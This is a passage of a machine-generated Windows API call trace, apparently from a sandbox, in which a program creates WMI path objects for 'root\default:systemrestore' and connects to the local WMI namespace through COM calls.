riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec70 | out: ppv=0x41ec70*=0x72015c) returned 0x0 [0112.456] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec68 | out: pAptType=0x41ec68*=1) returned 0x0 [0112.456] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec6c | out: ppvObject=0x41ec6c*=0x0) returned 0x80004002 [0112.456] IUnknown:Release (This=0x72015c) returned 0x1 [0112.457] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5d8 | out: ppv=0x41e5d8*=0x672f860) returned 0x0 [0112.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x672f860, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e7f0 | out: ppvObject=0x41e7f0*=0x0) returned 0x80004002 [0112.457] WbemDefPath:IClassFactory:CreateInstance (in: This=0x672f860, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e804 | out: ppvObject=0x41e804*=0x6730328) returned 0x0 [0112.457] WbemDefPath:IUnknown:Release (This=0x672f860) returned 0x0 [0112.457] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730328, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e424 | out: ppvObject=0x41e424*=0x6730328) returned 0x0 [0112.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730328, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3e0 | out: ppvObject=0x41e3e0*=0x0) returned 0x80004002 [0112.458] WbemDefPath:IUnknown:AddRef (This=0x6730328) returned 0x3 [0112.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730328, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd3c | out: ppvObject=0x41dd3c*=0x0) returned 0x80004002 [0112.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730328, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcec | out: ppvObject=0x41dcec*=0x0) returned 0x80004002 [0112.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730328, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dcf8 | out: ppvObject=0x41dcf8*=0x77da38) returned 0x0 [0112.458] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77da38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd00 | out: pCid=0x41dd00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0112.458] WbemDefPath:IUnknown:Release (This=0x77da38) returned 0x3 [0112.458] CoGetContextToken (in: pToken=0x41dd58 | out: pToken=0x41dd58) returned 0x0 [0112.458] CoGetContextToken (in: pToken=0x41e160 | out: pToken=0x41e160) returned 0x0 [0112.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730328, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e1f0 | out: ppvObject=0x41e1f0*=0x0) returned 0x80004002 [0112.458] WbemDefPath:IUnknown:Release (This=0x6730328) returned 0x2 [0112.458] WbemDefPath:IUnknown:Release (This=0x6730328) returned 0x1 [0112.458] CoGetContextToken (in: pToken=0x41eae8 | out: pToken=0x41eae8) returned 0x0 [0112.458] CoGetContextToken (in: pToken=0x41ea48 | out: pToken=0x41ea48) returned 0x0 [0112.458] WbemDefPath:IUnknown:QueryInterface (in: This=0x6730328, riid=0x41eb18*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb14 | out: ppvObject=0x41eb14*=0x6730328) returned 0x0 [0112.458] WbemDefPath:IUnknown:AddRef (This=0x6730328) returned 0x3 [0112.459] WbemDefPath:IUnknown:Release (This=0x6730328) returned 0x2 [0112.459] WbemDefPath:IWbemPath:SetText (This=0x6730328, uMode=0x4, pszPath="systemrestore") returned 0x0 [0112.459] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ecc0 | out: puCount=0x41ecc0*=0x2) returned 0x0 [0112.459] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=8, puBuffLength=0x41ecbc*=0x0, pszText=0x0 | out: puBuffLength=0x41ecbc*=0x11, pszText=0x0) returned 0x0 [0112.459] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=8, puBuffLength=0x41ecbc*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ecbc*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0112.459] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec10 | out: ppv=0x41ec10*=0x72015c) returned 0x0 [0112.459] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec08 | out: pAptType=0x41ec08*=1) returned 0x0 [0112.459] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec0c | out: ppvObject=0x41ec0c*=0x0) returned 0x80004002 [0112.459] IUnknown:Release (This=0x72015c) returned 0x1 [0112.460] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e578 | out: ppv=0x41e578*=0x672ccd0) returned 0x0 [0112.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e790 | out: ppvObject=0x41e790*=0x0) returned 0x80004002 [0112.460] WbemDefPath:IClassFactory:CreateInstance (in: This=0x672ccd0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e7a4 | out: ppvObject=0x41e7a4*=0x67303e8) returned 0x0 [0112.460] WbemDefPath:IUnknown:Release (This=0x672ccd0) returned 0x0 [0112.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x67303e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e3c4 | out: ppvObject=0x41e3c4*=0x67303e8) returned 0x0 [0112.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x67303e8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e380 | out: ppvObject=0x41e380*=0x0) returned 0x80004002 [0112.460] WbemDefPath:IUnknown:AddRef (This=0x67303e8) returned 0x3 [0112.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x67303e8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dcdc | out: ppvObject=0x41dcdc*=0x0) returned 0x80004002 [0112.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x67303e8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dc8c | out: ppvObject=0x41dc8c*=0x0) returned 0x80004002 [0112.460] WbemDefPath:IUnknown:QueryInterface (in: This=0x67303e8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dc98 | out: ppvObject=0x41dc98*=0x77da48) returned 0x0 [0112.461] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77da48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dca0 | out: pCid=0x41dca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0112.461] WbemDefPath:IUnknown:Release (This=0x77da48) returned 0x3 [0112.461] CoGetContextToken (in: pToken=0x41dcf8 | out: pToken=0x41dcf8) returned 0x0 [0112.461] CoGetContextToken (in: pToken=0x41e100 | out: pToken=0x41e100) returned 0x0 [0112.461] WbemDefPath:IUnknown:QueryInterface (in: This=0x67303e8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e190 | out: ppvObject=0x41e190*=0x0) returned 0x80004002 [0112.461] WbemDefPath:IUnknown:Release (This=0x67303e8) returned 0x2 [0112.461] WbemDefPath:IUnknown:Release (This=0x67303e8) returned 0x1 [0112.461] CoGetContextToken (in: pToken=0x41ea88 | out: pToken=0x41ea88) returned 0x0 [0112.461] CoGetContextToken (in: pToken=0x41e9e8 | out: pToken=0x41e9e8) returned 0x0 [0112.461] WbemDefPath:IUnknown:QueryInterface (in: This=0x67303e8, riid=0x41eab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eab4 | out: ppvObject=0x41eab4*=0x67303e8) returned 0x0 [0112.461] WbemDefPath:IUnknown:AddRef (This=0x67303e8) returned 0x3 [0112.461] WbemDefPath:IUnknown:Release (This=0x67303e8) returned 0x2 [0112.461] WbemDefPath:IWbemPath:SetText (This=0x67303e8, uMode=0x4, pszPath="\\\\.\\root\\default") returned 0x0 [0112.461] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730328, puCount=0x41ec60 | out: puCount=0x41ec60*=0x0) returned 0x0 [0112.461] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67303e8, puCount=0x41ec60 | out: puCount=0x41ec60*=0x2) returned 0x0 [0112.461] WbemDefPath:IWbemPath:GetText (in: This=0x67303e8, lFlags=16, puBuffLength=0x41ec5c*=0x0, pszText=0x0 | out: puBuffLength=0x41ec5c*=0xd, pszText=0x0) returned 0x0 [0112.461] WbemDefPath:IWbemPath:GetText (in: This=0x67303e8, lFlags=16, puBuffLength=0x41ec5c*=0xd, pszText="000000000000" | out: puBuffLength=0x41ec5c*=0xd, pszText="root\\default") returned 0x0 [0112.462] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x6730328) returned 0x0 [0112.462] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67303e8, puCount=0x41ec98 | out: puCount=0x41ec98*=0x2) returned 0x0 [0112.462] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x67303e8, uIndex=0x0, puNameBufLength=0x41ec94*=0x0, pName=0x0 | out: puNameBufLength=0x41ec94*=0x5, pName=0x0) returned 0x0 [0112.462] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x67303e8, uIndex=0x0, puNameBufLength=0x41ec94*=0x5, pName="0000" | out: puNameBufLength=0x41ec94*=0x5, pName="root") returned 0x0 [0112.462] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x6730328, uIndex=0x0, pszName="root") returned 0x0 [0112.462] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x67303e8, uIndex=0x1, puNameBufLength=0x41ec94*=0x0, pName=0x0 | out: puNameBufLength=0x41ec94*=0x8, pName=0x0) returned 0x0 [0112.462] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x67303e8, uIndex=0x1, puNameBufLength=0x41ec94*=0x8, pName="0000000" | out: puNameBufLength=0x41ec94*=0x8, pName="default") returned 0x0 [0112.463] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x6730328, uIndex=0x1, pszName="default") returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetServer (in: This=0x67303e8, puNameBufLength=0x41ec90*=0x0, pName=0x0 | out: puNameBufLength=0x41ec90*=0x2, pName=0x0) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetServer (in: This=0x67303e8, puNameBufLength=0x41ec90*=0x2, pName="0" | out: puNameBufLength=0x41ec90*=0x2, pName=".") returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetServer (in: This=0x6730328, puNameBufLength=0x41ec90*=0x0, pName=0x0 | out: puNameBufLength=0x41ec90*=0x2, pName=0x0) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetServer (in: This=0x6730328, puNameBufLength=0x41ec90*=0x2, pName="0" | out: puNameBufLength=0x41ec90*=0x2, pName=".") returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetInfo (in: This=0x6730328, uRequestedInfo=0x0, puResponse=0x41ecc8 | out: puResponse=0x41ecc8*=0xc15) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec9c | out: puCount=0x41ec9c*=0x2) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec98*=0x0, pszText=0x0 | out: puBuffLength=0x41ec98*=0x11, pszText=0x0) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec98*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec98*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730328, puCount=0x41ecbc | out: puCount=0x41ecbc*=0x2) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetText (in: This=0x6730328, lFlags=4, puBuffLength=0x41ecb8*=0x0, pszText=0x0 | out: puBuffLength=0x41ecb8*=0x1f, pszText=0x0) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetText (in: This=0x6730328, lFlags=4, puBuffLength=0x41ecb8*=0x1f, pszText="000000000000000000000000000000" | out: puBuffLength=0x41ecb8*=0x1f, pszText="\\\\.\\root\\default:systemrestore") returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730328, puCount=0x41ecbc | out: puCount=0x41ecbc*=0x2) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetText (in: This=0x6730328, lFlags=4, puBuffLength=0x41ecb8*=0x0, pszText=0x0 | out: puBuffLength=0x41ecb8*=0x1f, pszText=0x0) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetText (in: This=0x6730328, lFlags=4, puBuffLength=0x41ecb8*=0x1f, pszText="000000000000000000000000000000" | out: puBuffLength=0x41ecb8*=0x1f, pszText="\\\\.\\root\\default:systemrestore") returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec4c | out: puCount=0x41ec4c*=0x2) returned 0x0 [0112.463] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec48*=0x0, pszText=0x0 | out: puBuffLength=0x41ec48*=0x11, pszText=0x0) returned 0x0 [0112.464] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec48*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec48*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0112.464] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec10 | out: ppv=0x41ec10*=0x72015c) returned 0x0 [0112.464] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec08 | out: pAptType=0x41ec08*=1) returned 0x0 [0112.464] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec0c | out: ppvObject=0x41ec0c*=0x0) returned 0x80004002 [0112.464] IUnknown:Release (This=0x72015c) returned 0x1 [0112.464] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e830 | out: ppv=0x41e830*=0x672f370) returned 0x0 [0112.465] WbemLocator:IUnknown:QueryInterface (in: This=0x672f370, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41ea48 | out: ppvObject=0x41ea48*=0x0) returned 0x80004002 [0112.465] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f370, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ea5c | out: ppvObject=0x41ea5c*=0x672ccd0) returned 0x0 [0112.465] WbemLocator:IUnknown:Release (This=0x672f370) returned 0x0 [0112.465] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e67c | out: ppvObject=0x41e67c*=0x672ccd0) returned 0x0 [0112.465] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e638 | out: ppvObject=0x41e638*=0x0) returned 0x80004002 [0112.465] WbemLocator:IUnknown:AddRef (This=0x672ccd0) returned 0x3 [0112.465] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41df94 | out: ppvObject=0x41df94*=0x0) returned 0x80004002 [0112.465] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41df44 | out: ppvObject=0x41df44*=0x0) returned 0x80004002 [0112.465] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41df50 | out: ppvObject=0x41df50*=0x0) returned 0x80004002 [0112.465] CoGetContextToken (in: pToken=0x41dfb0 | out: pToken=0x41dfb0) returned 0x0 [0112.465] CoGetContextToken (in: pToken=0x41e3b8 | out: pToken=0x41e3b8) returned 0x0 [0112.465] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e448 | out: ppvObject=0x41e448*=0x0) returned 0x80004002 [0112.465] WbemLocator:IUnknown:Release (This=0x672ccd0) returned 0x2 [0112.465] WbemLocator:IUnknown:Release (This=0x672ccd0) returned 0x1 [0112.465] CoGetContextToken (in: pToken=0x41ea28 | out: pToken=0x41ea28) returned 0x0 [0112.465] CoGetContextToken (in: pToken=0x41e988 | out: pToken=0x41e988) returned 0x0 [0112.466] WbemLocator:IUnknown:QueryInterface (in: This=0x672ccd0, riid=0x41ea58*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41ea54 | out: ppvObject=0x41ea54*=0x672ccd0) returned 0x0 [0112.466] WbemLocator:IUnknown:AddRef (This=0x672ccd0) returned 0x3 [0112.466] WbemLocator:IUnknown:Release (This=0x672ccd0) returned 0x2 [0112.466] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ebec | out: puCount=0x41ebec*=0x2) returned 0x0 [0112.466] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=8, puBuffLength=0x41ebe8*=0x0, pszText=0x0 | out: puBuffLength=0x41ebe8*=0x11, pszText=0x0) returned 0x0 [0112.466] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=8, puBuffLength=0x41ebe8*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ebe8*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0112.466] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x41eac0 | out: ppv=0x41eac0*=0x672cce0) returned 0x0 [0112.466] WbemLocator:IWbemLocator:ConnectServer (in: This=0x672cce0, strNetworkResource="\\\\.\\root\\default", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x41eb58 | out: ppNamespace=0x41eb58*=0x673670c) returned 0x0 [0112.870] WbemLocator:IUnknown:QueryInterface (in: This=0x673670c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e9f0 | out: ppvObject=0x41e9f0*=0x780be4) returned 0x0 [0112.870] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780be4, pProxy=0x673670c, pAuthnSvc=0x41ea40, pAuthzSvc=0x41ea3c, pServerPrincName=0x41ea34, pAuthnLevel=0x41ea38, pImpLevel=0x41ea28, pAuthInfo=0x41ea2c, pCapabilites=0x41ea30 | out: pAuthnSvc=0x41ea40*=0xa, pAuthzSvc=0x41ea3c*=0x0, pServerPrincName=0x41ea34, pAuthnLevel=0x41ea38*=0x6, pImpLevel=0x41ea28*=0x2, pAuthInfo=0x41ea2c, pCapabilites=0x41ea30*=0x1) returned 0x0 [0112.870] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x1 [0112.870] WbemLocator:IUnknown:QueryInterface (in: This=0x673670c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e9e4 | out: ppvObject=0x41e9e4*=0x780c04) returned 0x0 [0112.870] WbemLocator:IUnknown:QueryInterface (in: This=0x673670c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e9e0 | out: ppvObject=0x41e9e0*=0x780be4) returned 0x0 [0112.870] WbemLocator:IClientSecurity:SetBlanket (This=0x780be4, pProxy=0x673670c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0112.870] WbemLocator:IUnknown:Release (This=0x780be4) returned 0x2 [0112.870] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0112.870] CoTaskMemFree (pv=0x77dde8) [0112.871] WbemLocator:IUnknown:Release (This=0x672cce0) returned 0x0 [0112.871] WbemLocator:IUnknown:QueryInterface (in: This=0x673670c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e5e0 | out: ppvObject=0x41e5e0*=0x780c04) returned 0x0 [0112.871] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fc00*(Data1=0xc3fcc19e, 